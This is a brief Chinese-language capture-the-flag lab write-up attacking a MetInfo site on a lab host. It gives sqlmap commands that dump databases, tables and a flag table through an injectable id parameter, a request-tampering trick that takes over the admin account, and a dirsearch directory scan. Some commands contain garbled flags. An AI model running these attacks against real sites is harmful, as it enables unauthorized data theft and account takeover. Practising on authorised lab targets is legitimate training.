地址:172.16.1.150 注意:请先配置本地hosts文件,添加test1.chinaskills.sx解析到目标靶机IP的记录
1.请找出其中隐藏的flag1,并将其提交。flag格式:flag1{uuid值};
再联系我们页面发现id=多少我们可以测试一下sql注入
sqlmap -u "http://172.16.1.150/about/show.php?lang=cn&id=15" --dbs --batch -dump h--random-agent
发现数据库接下来查表
sqlmap -u "http://172.16.1.150/about/show.php?lang=cn&id=15" -D metinfo --tables --batch -dump h--random-agent
发现flag表
直接查表
sqlmap -u "http://172.16.1.150/about/show.php?lang=cn&id=15" -D metinfo -T met_flag --columns --batch -dump h--random-agent
发现flag1
2.请找出其中隐藏的flag2,并将其提交。flag格式:flag2{uuid值};
首先尝试弱口令爆破admin用户的密码但是没出来,首先注册账号admin1/123321
登陆成功我们进行抓包猜测可以越权直接修改admin1为admin试试
3.请找出其中隐藏的flag3,并将其提交。flag格式:flag3{uuid值};
通过dirsearch扫描到flag.php
Comments NOTHING